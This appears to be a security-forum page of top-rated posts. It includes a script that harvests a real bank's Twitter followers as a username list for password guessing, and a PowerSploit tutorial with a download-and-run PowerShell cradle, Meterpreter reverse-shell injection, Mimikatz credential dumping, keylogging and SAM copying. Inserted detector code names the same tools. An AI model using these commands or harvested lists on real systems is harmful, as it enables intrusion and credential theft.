Leaderboard
Popular Content
Showing content with the highest reputation on 01/09/15 in all areas
-
This is where the problem with private data comes in. I create a document in which I write some text. They carry out a "search" and violate my privacy by reading my secret (which has nothing to do with the internet or with security). The trouble is that they probably don't just want "searches of the HDD" but also to use exploits or back-connect to rummage through your computer, maybe sniffing at the ISP as well. No such law, one that would allow an institution total access to a private computer system, exists anywhere else, and it cannot exist. What would the implications be if the SRI were to "check" the servers of large companies, copy confidential data and disclose secrets? As a user, it doesn't affect me. I patch every exploit as soon as it comes out, I use SSL, and if they come to my house (besides having my HDD encrypted) I deny owning a PC and invoke the fact that they need a warrant to enter my home.
8 points
-
Many corporations are not aware of the types of data that can be found and used by attackers in the wild. The information that you will be able to find will vary from target to target, but will typically include items such as IP ranges, domain names, e-mail addresses, public financial data, organizational information, technologies used, job titles, phone numbers, usernames and much more. The primary goal of the passive gathering stage is to gather as much actionable data as possible while at the same time leaving few or no indicators that anyone has searched for the data. It takes time and patience to sort through web pages, perform Google hacking, and map systems thoroughly in an attempt to understand the infrastructure of a particular target.

In this article, let’s assume that we have a task to perform a penetration test for an online banking system to verify the ability of guessing valid usernames and passwords. If you were a hacker, what would you do? Speaking for myself, first I would write up a quick script to create a dictionary file for potential usernames. Secondly, I would find out the company password policy (like password length, number of special characters and so on), and based on that, I would build my own password dictionary file. Finally, I would automate the process to see if I can get a correct password or maybe perform a DoS and block the account after X number of failed attempts!!

Many users are using the same username for their bank account, Facebook, Twitter, and other social media. So let’s forge a small Python script to illustrate how an attacker could use ordinary publicly available information and build up a dictionary file which contains Twitter followers for Arab Bank. At the time of writing this article, Arab Bank has around 24,027 followers. Let’s bring them up!

**Disclaimer: all of the actions explained in this article are counted under Passive Information Gathering and considered legitimate. We just spotlight a smart way of data collection.**

Build your own dictionary file

Twitter and many social websites have something called an API (Application Programming Interface) which allows a programmer to write his own code to interact with Twitter and Get/Post information from/to Twitter. Fortunately we have many libraries in Python that make my job much easier, so all I need to do is to register in Twitter developers and use the developer ID/keys in my script to run. The registration process should be something similar to these snapshots:

Tweepy is a Python third-party library that allows us to parse Twitter’s data. Installing Tweepy is pretty easy:

```
hkhrais@Hkhrais:~$ sudo apt-get install python-pip
hkhrais@Hkhrais:~$ sudo pip install tweepy
```

Source Code

```python
import tweepy
import time

# insert your Twitter keys here
consumer_key = 'blah blah blah'
consumer_secret = 'blah blah blah'
access_token = 'blah blah blah'
access_secret = 'blah blah blah'

# authenticate to Twitter with the developer keys (OAuth 1.0a)
auth = tweepy.auth.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
api = tweepy.API(auth)

# output file: one follower screen name per line
out = open('/home/hkhrais/Desktop/list.txt', 'w')

if api.verify_credentials():
    print 'We successfully logged in'

# cursor over every follower of @arabbankgroup, one API page at a time
user = tweepy.Cursor(api.followers, screen_name="arabbankgroup").items()
while True:
    try:
        u = next(user)
        out.write(u.screen_name + '\n')
    except StopIteration:
        # cursor exhausted: the whole follower list has been written
        break
    except tweepy.TweepError:
        # rate limit exceeded (code 88): wait for the window to reset
        print 'We got a timeout ... Sleeping for 15 minutes'
        time.sleep(15 * 60)
out.close()
```

The code is almost self explanatory. I passed the consumer/token keys to the function “OAuthHandler” to identify/authenticate myself to Twitter, and after that I asked to get the followers ID for ‘arabbankgroup’ and store it in the variable “user”. According to the Twitter development paper, there’s a limit for how many requests a program can ask. In the case of getting the followers ID, we should wait around 15 minutes, otherwise a limit excess exception will show up:

```
tweepy.error.TweepError: [{'message': 'Rate limit exceeded', 'code': 88}]
```

Execution Output

```
hkhrais@Hkhrais:~/Desktop/Tweets$ sudo python Twitter.py
[sudo] password for hkhrais:
We successfully logged in
We got a timeout ... Sleeping for 15 minutes
We got a timeout ... Sleeping for 15 minutes
We got a timeout ... Sleeping for 15 minutes
We got a timeout ... Sleeping for 15 minutes
...
We got a timeout ... Sleeping for 15 minutes
Traceback (most recent call last):
  File "Twitter.py", line 31, in <module>
    u = next(user)
  File "/usr/local/lib/python2.7/dist-packages/tweepy/cursor.py", line 181, in next
    self.current_page = self.page_iterator.next()
  File "/usr/local/lib/python2.7/dist-packages/tweepy/cursor.py", line 64, in next
    raise StopIteration
StopIteration
hkhrais@Hkhrais:~/Desktop/Tweets$
```

Note that the last exception indicates iteration completion, which means we’ve grabbed the whole list of followers’ usernames. The result:

Conclusion

Intelligence gathering requires careful planning, research, and, most importantly, the ability to think like an attacker. With a small Python script (around 25 lines), we could retrieve 24,027 followers’ usernames for @arabbankgroup, which can be used as a good dictionary of usernames. Keep in mind that this script comes in very handy, especially if our target usernames are non-English!

References
• Twitter API https://dev.twitter.com/docs/twitter-libraries
• Tweepy library https://pypi.python.org/pypi/tweepy/

Source
4 points
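On the defender's side of the scenario the article describes (a harvested username list run against a bank login, with account lockouts as a side effect), here is an added example, not part of the original article, that flags that pattern in login audit logs; the log format, the sample lines and the thresholds are all constructed for this example.

```python
"""Detect dictionary-of-usernames runs and lockout pressure in login logs.

Log format and sample lines are constructed for this example.
"""
import re
from collections import defaultdict

# constructed format: <ISO timestamp> src=<ip> user=<name> result=<ok|fail|locked>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail|locked)$"
)

SAMPLE_LOG = """\
2015-01-09T10:00:01Z src=203.0.113.7 user=ahmad_k result=fail
2015-01-09T10:00:02Z src=203.0.113.7 user=sara.m result=fail
2015-01-09T10:00:02Z src=203.0.113.7 user=omar88 result=fail
2015-01-09T10:00:03Z src=203.0.113.7 user=layla_b result=fail
2015-01-09T10:00:03Z src=203.0.113.7 user=khalid_x result=fail
2015-01-09T10:00:04Z src=203.0.113.7 user=nour.h result=fail
2015-01-09T10:00:10Z src=198.51.100.4 user=omar88 result=fail
2015-01-09T10:00:11Z src=198.51.100.4 user=omar88 result=fail
2015-01-09T10:00:12Z src=198.51.100.4 user=omar88 result=fail
2015-01-09T10:00:13Z src=198.51.100.4 user=omar88 result=fail
2015-01-09T10:00:14Z src=198.51.100.4 user=omar88 result=locked
2015-01-09T10:05:00Z src=192.0.2.25 user=sara.m result=fail
2015-01-09T10:05:09Z src=192.0.2.25 user=sara.m result=ok
"""


def parse(log_text):
    """Yield a dict per well-formed line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def find_spray_sources(events, min_distinct_users=5, max_attempts_per_user=2):
    """Sources failing against many distinct usernames with few tries each:
    the signature of a harvested username dictionary run against a login."""
    fails = defaultdict(lambda: defaultdict(int))  # src -> user -> failures
    for e in events:
        if e["result"] != "ok":
            fails[e["src"]][e["user"]] += 1
    flagged = {}
    for src, per_user in fails.items():
        if (len(per_user) >= min_distinct_users
                and max(per_user.values()) <= max_attempts_per_user):
            flagged[src] = sorted(per_user)
    return flagged


def find_lockout_abuse(events, fail_threshold=4):
    """Accounts driven to (or near) lockout from one source: the
    denial-of-service outcome the article mentions."""
    fails = defaultdict(int)  # (src, user) -> failures
    locked = set()
    for e in events:
        key = (e["src"], e["user"])
        if e["result"] == "fail":
            fails[key] += 1
        elif e["result"] == "locked":
            locked.add(key)
    rows = [{"src": s, "user": u, "failures": n, "locked": (s, u) in locked}
            for (s, u), n in fails.items()
            if n >= fail_threshold or (s, u) in locked]
    return sorted(rows, key=lambda r: (r["src"], r["user"]))


def analyse(log_text=SAMPLE_LOG):
    """Run both detections over a log and return the findings."""
    events = list(parse(log_text))
    return {"spray": find_spray_sources(events),
            "lockout": find_lockout_abuse(events)}


if __name__ == "__main__":
    report = analyse()
    for src, users in report["spray"].items():
        print("spray from %s: %d distinct usernames" % (src, len(users)))
    for r in report["lockout"]:
        print("lockout pressure on %s from %s (%d failures, locked=%s)"
              % (r["user"], r["src"], r["failures"], r["locked"]))
```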
-
Amid all the noise the Sony hack generated over the holidays, a far more troubling cyber attack was largely lost in the chaos. Unless you follow security news closely, you likely missed it. I’m referring to the revelation, in a German report released just before Christmas (.pdf), that hackers had struck an unnamed steel mill in Germany. They did so by manipulating and disrupting control systems to such a degree that a blast furnace could not be properly shut down, resulting in “massive”—though unspecified—damage. This is only the second confirmed case in which a wholly digital attack caused physical destruction of equipment. The first case, of course, was Stuxnet, the sophisticated digital weapon the U.S. and Israel launched against control systems in Iran in late 2007 or early 2008 to sabotage centrifuges at a uranium enrichment plant. That attack was discovered in 2010, and since then experts have warned that it was only a matter of time before other destructive attacks would occur. Industrial control systems have been found to be rife with vulnerabilities, though they manage critical systems in the electric grid, in water treatment plants and chemical facilities and even in hospitals and financial networks. A destructive attack on systems like these could cause even more harm than at a steel plant. It’s not clear when the attack in Germany took place. The report, issued by Germany’s Federal Office for Information Security (or BSI), indicates the attackers gained access to the steel mill through the plant’s business network, then successively worked their way into production networks to access systems controlling plant equipment. The attackers infiltrated the corporate network using a spear-phishing attack—sending targeted email that appears to come from a trusted source in order to trick the recipient into opening a malicious attachment or visiting a malicious web site where malware is downloaded to their computer. 
Once the attackers got a foothold on one system, they were able to explore the company’s networks, eventually compromising a “multitude” of systems, including industrial components on the production network. “Failures accumulated in individual control components or entire systems,” the report notes. As a result, the plant was “unable to shut down a blast furnace in a regulated manner” which resulted in “massive damage to the system.” According to the report, the attackers appeared to possess advanced knowledge of industrial control systems. “The know-how of the attacker was very pronounced not only in conventional IT security but extended to detailed knowledge of applied industrial controls and production processes,” the report says. The report doesn’t name the plant or indicate when the breach first occurred or how long the hackers were in the network before the destruction occurred. It’s also unclear if the attackers intended to cause the physical destruction or if this was simply collateral damage. The incident underscores, however, what experts have been warning about in the wake of Stuxnet: although that nation-state digital weapon had been expertly designed to avoid collateral damage, not all intrusions into critical infrastructure are likely to be as careful or as well-designed as Stuxnet, so damage may occur even when the hackers never intend it. The report also illustrates the need for strict separation between business and production networks to keep hackers from leaping from one network to another and remotely accessing critical systems over the internet. Although a network can only be considered truly air-gapped if it’s not connected to the internet and is not connected to other systems that are connected to the internet, many companies believe that a software firewall separating the business and production network is sufficient to stop hackers from making that leap. 
But experts warn that a software firewall can be misconfigured or contain security holes that allow hackers to break through or bypass them nonetheless. It’s not known how the German network was configured.

Source
2 points
-
Hello, I would like to know how I can get an invitation to filelist.... can anyone help me? Thanks
1 point
-
I used the jquery.facedetection library; it recognizes the face in an image and frames it in a box (Facebook style). DOWNLOAD
1 point
-
Original Apollo 11 guidance computer (AGC) source code, in assembly, for the Command Module (Comanche054) and Lunar Module (Luminary099). DOWNLOAD
1 point
-
PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test. To get the latest version of PowerSploit, visit this URL: https://github.com/mattifestation/PowerSploit

If you have GIT, then you can simply run the following command to get all files from the github repository:

```
git clone https://github.com/mattifestation/PowerSploit.git
```

To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions. Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it. For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python:

```
python -m SimpleHTTPServer
```

Now all the files in the PowerSploit directory can easily be accessed over http://<ip_address>:8000/

PowerSploit has categorized all the scripts in a pretty clear and organized manner:

| Category | Description |
| --- | --- |
| Antivirus Bypass | Find bytes of a file which have a matching signature in antivirus. |
| Code Execution | Used to execute code on the victim machine. |
| Exfiltration | Manipulate and collect information & data from victim machine(s). |
| Persistence | Maintain control of a machine by adding persistence to scripts. |
| PE Tools | Handy PowerShell cmdlets for enumeration. |
| Recon | Perform reconnaissance tasks using the victim machine. |
| Reverse Engineering | Help perform reverse engineering & malware analysis. It has now been moved to PowerShellArsenal. |
| Script Modification | Create and manipulate scripts on the victim machine. |

In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration).

Install and run a PowerShell script:

```
IEX (New-Object Net.WebClient).DownloadString("http://<ip_address>/full_path/script_name.ps1")
```

This command, when run in PowerShell, will install that PowerShell script for the current PowerShell process only.

Invoke-Shellcode

This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk. We can easily install the Code Execution PowerShell script “Invoke-Shellcode” using:

Run the above command in a PowerShell window to install the “Invoke-Shellcode” script. To get some information about the module, type:

```
Get-Help Invoke-Shellcode
```

Inject the payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell:

Also we had set up a Multi Handler exploit and compatible payload in Metasploit. Executing the above PowerSploit script will give us a Meterpreter shell. Please note that at the time of writing this article, only two Metasploit payloads are supported:

- windows/meterpreter/reverse_http
- windows/meterpreter/reverse_https

If you want to inject into some other process, you can either create a new process and then inject into it, or inject into an existing process.

Inject in an existing process: Get the Process ID (PID) of a process using “Get-Process”. Note that the “Id” field is the Process ID (PID) of the corresponding process name. Inject the Metasploit payload into the “svchost” process with PID 1228. Note that I have removed the “-Force” switch from the command, due to which it is now asking for user confirmation before injecting the payload.

After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below:

Inject in a new process: Create a new hidden process and inject the payload into it:

And we got a Meterpreter shell on the attacking machine:

Invoke-DllInjection

This cmdlet is used to inject a DLL file into an existing process using its Process ID (PID). Using this feature, a DLL can easily be injected into processes. The only disadvantage with this cmdlet is that it requires the DLL to be written on the disk. We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using:

Generate the Metasploit Meterpreter DLL and download it on the server:

Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice. Create a process in hidden mode and inject the DLL into it.

We received a successful Meterpreter shell on the attacking machine:

Find-AVSignature

This cmdlet is used to split a file into specific byte sizes. The split bytes are stored in separate files, which will be detected by the installed antivirus and quarantined or removed. By noting the removed files, we can easily find the parts of the file which have the AV signature. We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using:

Running “Find-AVSignature” on a Meterpreter Windows executable:

The installed antivirus detected malicious files and we can see the bytes with the AV signature:

Now we can see the bytes of “msf.exe” containing AV signatures.

Get-DllLoadPath

This cmdlet can be used to find the path at which an executable looks for the DLL we are querying for. For example, we want to know at what location “cmd.exe” is looking for the “shell32.dll” DLL file. Using this information, we can replace the original DLL with a malicious DLL and get it executed to receive a reverse shell or perform any other task. This technique can be very useful for privilege escalation. We can easily install the PE Tools PowerShell script “Find-DllLoadPath” using:

Find where “Acrobat.exe” loads the “shell32.dll” DLL from:

Invoke-Portscan

This cmdlet is used to run a port scan on other hosts and find open ports. You will find a number of similarities between Nmap and this cmdlet, but not all. We can easily install the Recon PowerShell script “Invoke-Portscan” using:

Run a port scan for a list of hosts and ports:

There are a number of options using which you can customize the port scan. Use “Get-Help Invoke-PortScan –full” for all options. It also supports saving output in files just like Nmap (GNMAP, NMAP and XML) using the -oG, -oX and -oA switches respectively.

Invoke-ReverseDnsLookup

This cmdlet is used to find the DNS PTR record for the corresponding IP address(es). We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using:

Execute the cmdlet using the below command, which accepts an IP or IP range in the “-IpRange” switch:

Unfortunately, it does not support comma separated values or file input of ranges like 173.194.117.1-50. It accepts only a single IP or CIDR format for the IP range.

Get-HttpStatus

This cmdlet is used to run a dictionary attack against a web server to find the HTTP status of a path or file on an HTTP/HTTPS service. It is not very feature rich and does not support a nested dictionary attack. It accepts a file containing path names or file names to check for HTTP status on a web server. We can easily install the Recon PowerShell script “Get-HttpStatus” using:

Execute this cmdlet using the following command (the dictionary file is that of DirBuster):

If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests:

If the service is running on some other port like 8080, 8000, etc., use the “-Port” switch to define the port. It is not as good as the DirBuster tool, but it’s good to have the PowerShell script too.

Get-Strings

This cmdlet is used to find Unicode or ASCII characters in a file. It is similar to what we have in UNIX based systems, the “strings” utility. We can easily install the Reverse Engineering PowerShell script “Get-Strings” using:

```
Get-Strings -Path <file_name_with_path>
```

It is similar to the “strings” utility that we have in Linux. But here we have it for PowerShell. Note that Reverse Engineering has been moved from PowerSploit to PowerToolsArsenal (https://github.com/mattifestation/PowerShellArsenal) now.

Invoke-Mimikatz

This cmdlet is a port of the original Mimikatz project in PowerShell. The benefit of using this over the Mimikatz executable is that it remains in memory. It can be used to dump credentials, certificates, etc. from the local computer or other computers in the domain. It is one of the most useful PowerSploit tools in a penetration testing engagement. We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using:

Dump credentials using:

```
Invoke-Mimikatz -DumpCreds
```

You can even dump credentials and certificates of other computers using -ComputerName @(“computer1,….)

Get-Keystrokes

This cmdlet is used to log the keystrokes which are pressed on the victim machine. It can be used as a keylogger. But all the logged keystrokes are stored in a local file, in the default location (temp directory) or a custom location. We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using:

This cmdlet can be executed using the following command:

The key log is stored in: c:\users\master\desktop\keylogger.txt

This script also supports “-CollectionInterval”, using which you can define after how many minutes keystrokes should be captured. Do note that the key logging is very detailed, containing the pressed button, username, application name and timestamp.

Invoke-NinjaCopy

This cmdlet is used to copy protected files which cannot be copied when the operating system is running. We can easily install the Exfiltration PowerShell script “Invoke-NinjaCopy” using:

Execute “Invoke-NinjaCopy” using the following command to copy the protected “SAM” file:

When you try to perform the same operation using the “copy” command, the file cannot be copied:

Source
1 point
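As an added example, not from the article or from PowerSploit itself, here is a small Python detector for the activity the article walks through (the DownloadString download cradle, Invoke-Shellcode with a Meterpreter payload, Invoke-Mimikatz -DumpCreds, Get-Keystrokes, and Invoke-NinjaCopy of the SAM file) run over constructed script block log records; the rule names and sample records are this example's own.

```python
"""Flag PowerSploit-style activity in PowerShell script block logs.

Windows records the text of executed script blocks as event 4104 when
script block logging is enabled; the records below are constructed for
this example and the rule names are this example's own.
"""
import re

# constructed 4104-style records: (record id, script block text)
SAMPLE_EVENTS = [
    (101, 'IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.5:8000/CodeExecution/Invoke-Shellcode.ps1")'),
    (102, 'Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.0.0.5 -Lport 443 -Force'),
    (103, 'inv`oke-mi`mikatz -Du`mpCreds'),
    (104, 'Get-Keystrokes -LogPath C:\\Users\\master\\Desktop\\keylogger.txt'),
    (105, 'Get-Process | Where-Object { $_.Name -eq "svchost" }'),
    (106, 'Invoke-NinjaCopy -Path C:\\Windows\\System32\\config\\SAM -LocalDestination C:\\temp\\sam'),
]

# each rule: name -> regexes that must ALL match the normalised text
RULES = {
    "download-cradle": [r"net\.webclient", r"downloadstring", r"\b(iex|invoke-expression)\b"],
    "invoke-shellcode": [r"invoke-shellcode", r"windows/meterpreter/reverse_https?"],
    "invoke-mimikatz-dumpcreds": [r"invoke-mimikatz", r"-dumpcreds"],
    "invoke-dllinjection": [r"invoke-dllinjection", r"-processid"],
    "get-keystrokes": [r"get-keystrokes"],
    "invoke-ninjacopy-sam": [r"invoke-ninjacopy", r"\\config\\sam\b"],
}


def normalise(script_text):
    """Lower-case, drop the backtick escape character (used to split tokens
    apart) and collapse whitespace so the regexes see one canonical form."""
    text = script_text.replace("`", "").lower()
    return re.sub(r"\s+", " ", text)


def match_rules(script_text):
    """Return the sorted names of every rule whose regexes all match."""
    norm = normalise(script_text)
    hits = [name for name, patterns in RULES.items()
            if all(re.search(p, norm) for p in patterns)]
    return sorted(hits)


def scan(events=SAMPLE_EVENTS):
    """Map record id -> rule hits, omitting records that trigger nothing."""
    findings = {}
    for record_id, text in events:
        hits = match_rules(text)
        if hits:
            findings[record_id] = hits
    return findings


if __name__ == "__main__":
    for rid, hits in sorted(scan().items()):
        print("event %d: %s" % (rid, ", ".join(hits)))
```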
-
Links for those interested: https://www.dropbox.com/sh/xepvhylyda64a0z/AAAOndgT2lgNse2uNaqrKI00a?dl=0 Have fun!
1 point
-
```php
<?php
// 200 threads: split the link list into 200 chunks and fork one worker per chunk
// ($links is the array of URLs built earlier in the script)
$chunkSize = max(1, (int) ceil(count($links) / 200));
foreach (array_chunk($links, $chunkSize) as $threadChunk) {
    if (!pcntl_fork()) {
        // child process: parse $threadChunk here and check the links
        exit;
    }
}
// parent: wait for every child and collect its exit status
while (pcntl_waitpid(0, $status) != -1) {
    $status = pcntl_wexitstatus($status);
}
```
1 point
-
There are a lot of ways to modify the execution of a program, including at least using the Windows Compatibility Toolkit (a good reference is Mark Baggett’s Derbycon talk), modifying the environment, manually patching the binary before it runs, and function hooking. Function hooking generally refers to any method where you’re able to intercept and modify function calls of a running process. A simple example of a function hook might be “every time the program calls AESEncrypt, first save the plaintext to a file and then call AESEncrypt”.

There are also many different ways to function hook, and in my opinion there isn’t really a “best” way – it just depends on what you’re trying to do. For example, if you’re doing something to try to be sneaky, one of the best ways may be like Joe outlines here:

- Reflectively load your DLL using powershell so nothing needs to ever touch disk
- In your DLL, write a C function that contains the functionality to execute. Optionally, return control to the original function
- Overwrite the first bytes of the function to jump to your DLL

However, if your goal is to change the behavior of a program and you don’t care about stealth (e.g. you’re just using hooking as an aid to testing) there are easier ways to accomplish the same goal. “Soft” function hooking usually refers to attaching a debugger to a program and using the debugger’s functionality to modify the behavior. I’ve seen this approach elsewhere – in Gray Hat Python, they use this technique with pydbg and immunitydbg. I learned about pykd because of mona for windbg. I messed with pykd last week, and I like it quite a bit (at least more than windbg plugin alternatives I’ve used like powerdbg). There are pluses and minuses when compared with something like immunity debugger. Pykd doesn’t currently have nearly the number of convenience functions immunitydbg has (for example, you have to store your strings in memory manually).

UPDATE: In this case I was looking for something like remotevirtualalloc and didn’t see it. But @corelanc0d3r pointed me at windbglib, which has these exact convenience functions.

But Windbg is just a more powerful debugger. For example, immunitydbg is awesome, but it doesn’t work with 64 bit processes, following child processes, kernel debugging, etc.

Here is a simple example. I ran into a situation where a team’s test box had hard coded a test server to listen only on localhost. This can be a pain to debug, because a lot of my tools are on other boxes and plus I can’t do things like see what’s actually going on with wireshark. This is a quick script that modifies the behavior of inet_addr, which is where this binary passed the hard coded localhost to (if you’re wondering why I didn’t just patch it – that was an option too, but there was some other important stuff right next to it in .data and ‘localhost’ was too small to fit my IP). So this hook simply grabs the current IP and passes it as the arg to inet_addr instead of “localhost”.

Some things I got a bit stuck on:

- Use the second argument with setBp to have a callback function on the breakpoints, and then use this to modify things. Note you can’t mess with execution within the function itself. Before going this route I tried to use the EventHandlers (like onBreakPoint) and ended up with weird errors.
- Within your callback function, if you return True (or nothing), execution will halt, and if you return False then execution will continue.

```python
#!/usr/bin/python
import pykd
import socket

# pykd script to modify inet_addr calls to a supplied IP address


def getAddress(localAddr):
    # resolve a symbol (e.g. WS2_32!inet_addr) to its address with windbg's "x" command
    res = pykd.dbgCommand("x " + localAddr)
    if res.count("\n") > 1:
        print "[-] Warning, more than one result for", localAddr
    return res.split()[0]


class handle_inet(pykd.eventHandler):
    def __init__(self):
        #pykd.eventHandler.__init__(self)
        self.localAddr = socket.gethostbyname(socket.gethostname())
        print "[+] Using ip address: " + self.localAddr
        bp_init = getAddress("WS2_32!inet_addr")
        # break at the entry of inet_addr; the callback swaps the argument
        self.bp_init = pykd.setBp(int(bp_init, 16), self.handle_inet_begin)
        self.bp_end = None
        pykd.go()

    def handle_inet_begin(self, args):
        print args
        print "[+] At start of inet_addr."
        ow_len = len(self.localAddr) + 1
        #just save our string below us on the stack. We'll restore it on return
        #ret_addr = pykd.dbgCommand("k1").split("\n")[1].split()[1] #k doesn't work in win7, wtf
        self.ret_addr = pykd.dbgCommand("dd esp L1").split()[1]
        print "[+] saving return ptr: " + self.ret_addr
        # second breakpoint on the return address so we can restore the stack afterwards
        self.bp_end = pykd.setBp(int(self.ret_addr, 16), self.handle_inet_end)
        self.stack_addr = pykd.reg("esp") + 500
        print "[+] using this stack address to save our string: " + hex(self.stack_addr)
        self.old_stack = pykd.loadBytes(self.stack_addr, ow_len)
        print "[+] Writing over old stack stuff"
        pykd.dbgCommand("ea " + hex(self.stack_addr) + " \"" + self.localAddr + '"')
        #null terminate
        pykd.dbgCommand("eb " + hex(self.stack_addr) + "+" + hex(len(self.localAddr)) + " 00")
        #esp + 4 is the IP address parameter for inet_addr
        pykd.dbgCommand("ed esp+4 " + hex(self.stack_addr))
        #Since this is a conditional bp, this makes the debugger continue
        return False

    def handle_inet_end(self, bp):
        if self.bp_end == bp:
            print "[+] Call complete"
            old_stack = " ".join([hex(i)[2:] for i in self.old_stack])
            pykd.dbgCommand("eb " + hex(self.stack_addr) + " " + old_stack)
            print "[+] Old stack stuff restored"
            self.bp_end = None
        #Since this is a conditional bp, this makes the debugger continue
        return False


d_handle = handle_inet()
```

If you know windbg basics and python, this should be really familiar – I have a tiny bit of python to grab the IP, and then inside the handlers I’m pretty much just running windbg commands sequentially. I ran this in the debugger itself.

Here’s a side tip. You can put commands in a text file for them to run in windbg (similar to gdb’s -x arg). So you can do this to load this pykd script automatically.

```
> type windbg.txt
.load pykd.pyd
!py local_listen.py
> windbg -c "$$><windbg.txt" server1.exe
```

Another option would be to run this directly from the command line, which is also doable. Just use the pykd “attachProcess” or “startProcess” functions and go from there.

Source
1 point
-
Fake and gay. Closed! By the way, this section is not a replacement for the "fun stuff" thread.
1 point